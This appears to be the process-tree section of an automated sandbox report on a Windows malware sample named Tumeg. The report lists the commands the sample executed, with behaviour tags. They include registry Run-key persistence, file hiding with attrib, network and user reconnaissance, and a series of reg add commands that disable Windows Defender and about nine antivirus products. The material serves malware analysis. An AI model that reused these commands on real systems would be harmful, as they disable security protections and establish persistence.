    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9136 /prefetch:1
    3⤵
    PID:3556
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
    3⤵
    PID:5024
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5980 /prefetch:8
    3⤵
    PID:6524
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7268 /prefetch:8
    3⤵
    PID:4212
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4012 /prefetch:8
    3⤵
    PID:4224
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6652 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6452
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1
    3⤵
    PID:1388
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7448 /prefetch:1
    3⤵
    PID:468
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9680 /prefetch:1
    3⤵
    PID:4156
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10144 /prefetch:1
    3⤵
    PID:3864
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1916 /prefetch:1
    3⤵
    PID:3032
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3412 /prefetch:8
    3⤵
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:4528
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10076 /prefetch:1
    3⤵
    PID:6648
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1 -w 1000
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:3804
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:4828
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:1636
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:1400
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:8
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:3764
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:2296
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:1168
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:3948
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:2008
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:872
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:3172
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:3872
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:2964
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:2360
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:3292
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:1736
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:1508
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:1864
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:3172
- C:\Windows\system32\cscript.exe
  cscript "C:\Users\Admin\AppData\Local\Temp\f11.vbs"
  2⤵
  PID:1524
- C:\Windows\system32\sc.exe
  sc config winpeshl start=disabled
  2⤵
  - Launches sc.exe
  PID:2456
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v DisallowWinPELicensing /t REG_DWORD /d 1 /f
  2⤵
  PID:5264
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx" /v "TITLE" /t REG_SZ /d "Tumeg doesn't want to upload your files LOL!" /f
  2⤵
  - Adds Run key to start application
  PID:5692
- C:\Windows\system32\attrib.exe
  attrib +r "C:\ProgramData\Tumeg.exe"
  2⤵
  - Views/modifies file attributes
  PID:5736
- C:\Windows\system32\attrib.exe
  attrib +h "C:\ProgramData\Tumeg.exe"
  2⤵
  - Views/modifies file attributes
  PID:5780
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\links.vbs"
  2⤵
  PID:5840
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=hydra+dragon+antivirus+(rogue+real)
    3⤵
    PID:4196
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff284c46f8,0x7fff284c4708,0x7fff284c4718
      4⤵
      PID:2672
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=free+robux
    3⤵
    PID:5528
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x130,0x134,0x138,0x108,0x13c,0x7fff284c46f8,0x7fff284c4708,0x7fff284c4718
      4⤵
      PID:3456
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=how+to+download+windows+12
    3⤵
    PID:5312
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff284c46f8,0x7fff284c4708,0x7fff284c4718
      4⤵
      PID:4360
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=how+to+make+virus+with+batch
    3⤵
    PID:648
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff284c46f8,0x7fff284c4708,0x7fff284c4718
      4⤵
      PID:2700
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=roblox+fps+unlocker
    3⤵
    PID:6988
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff284c46f8,0x7fff284c4708,0x7fff284c4718
      4⤵
      PID:7004
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=bandicam+serial+key+free+download
    3⤵
    PID:6652
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x138,0x13c,0x140,0x114,0x144,0x7fff284c46f8,0x7fff284c4708,0x7fff284c4718
      4⤵
      PID:1340
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=Is+protogent+safe?
    3⤵
    PID:6240
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff284c46f8,0x7fff284c4708,0x7fff284c4718
      4⤵
      PID:5604
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=wannacry+dowloand
    3⤵
    PID:6580
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff284c46f8,0x7fff284c4708,0x7fff284c4718
      4⤵
      PID:64
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=download+rogue+antivirus
    3⤵
    PID:5264
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff284c46f8,0x7fff284c4708,0x7fff284c4718
      4⤵
      PID:5020
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=no+escape+exe+antivirus
    3⤵
    PID:2324
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff284c46f8,0x7fff284c4708,0x7fff284c4718
      4⤵
      PID:3772
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=pdf+converter
    3⤵
    PID:436
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x12c,0x130,0x134,0x128,0x138,0x7fff284c46f8,0x7fff284c4708,0x7fff284c4718
      4⤵
      PID:2744
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=gta+6+leaks
    3⤵
    PID:4352
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff284c46f8,0x7fff284c4708,0x7fff284c4718
      4⤵
      PID:4236
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=download+rogue+antivirus
    3⤵
    PID:6980
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff284c46f8,0x7fff284c4708,0x7fff284c4718
      4⤵
      PID:5960
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duckduckgo.com/?q=gta+6+download+full+version
    3⤵
    PID:6964
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff284c46f8,0x7fff284c4708,0x7fff284c4718
      4⤵
      PID:824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ipconfig | findstr /C:"IPv4 Address"
  2⤵
  PID:5940
- - C:\Windows\system32\ipconfig.exe
    ipconfig
    3⤵
    - Gathers network information
    PID:5956
- - C:\Windows\system32\findstr.exe
    findstr /C:"IPv4 Address"
    3⤵
    PID:5964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic useraccount where "Name='Admin'" get Caption
  2⤵
  PID:6020
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic useraccount where "Name='Admin'" get Caption
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com | find "Address"
  2⤵
  PID:8
- - C:\Windows\system32\nslookup.exe
    nslookup myip.opendns.com. resolver1.opendns.com
    3⤵
    PID:5228
- - C:\Windows\system32\find.exe
    find "Address"
    3⤵
    PID:5256
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "StartupScript" /t REG_SZ /d "C:\Windows\System32\config\startup2.bat" /f
  2⤵
  - Adds Run key to start application
  PID:6080
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "StartupScript" /t REG_SZ /d "C:\Windows\System32\config\startup3.bat" /f
  2⤵
  - Adds Run key to start application
  PID:3792
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "StartupScript" /t REG_SZ /d "C:\Windows\System32\config\startup4.bat" /f
  2⤵
  - Adds Run key to start application
  PID:5864
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "StartupScript" /t REG_SZ /d "C:\Windows\System32\config\startup5.bat" /f
  2⤵
  - Adds Run key to start application
  PID:5544
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v "AntiVirusOverride" /t REG_DWORD /d "1" /f
  2⤵
  - Windows security bypass
  PID:3292
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:5824
- C:\Windows\system32\reg.exe
  reg add "HKEY_CLASSES_ROOT\.cat" /v "Content Type" /t REG_SZ /d "dllhost.exe" /f
  2⤵
  PID:5788
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\AVAST Software\Avast" /v "aswidsagenta" /t REG_DWORD /d "0" /f
  2⤵
  - Checks for any installed AV software in registry
  PID:4208
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\AVG" /v "DisableAv" /t REG_DWORD /d "1" /f
  2⤵
  PID:2584
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /v "BlockUserModeAccess" /t REG_DWORD /d "1" /f
  2⤵
  PID:4204
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\McAfee" /v "bDisableSelfProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:632
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security" /v "ProtectEnabled" /t REG_DWORD /d "0" /f
  2⤵
  PID:5796
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab" /v "Enable" /t REG_DWORD /d "0" /f
  2⤵
  PID:5100
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /v "MalwareProtectionEnabled" /t REG_DWORD /d "0" /f
  2⤵
  PID:1232
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Norton" /v "Enable" /t REG_DWORD /d "0" /f
  2⤵
  PID:5480
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Avira" /v "ProductEnabled" /t REG_DWORD /d "0" /f
  2⤵
  - Checks for any installed AV software in registry
  PID:5472
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangeTime /t REG_DWORD /d 1 /f
  2⤵
  PID:5488
- C:\Windows\system32\attrib.exe
  attrib -r -s -h "C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf"
  2⤵
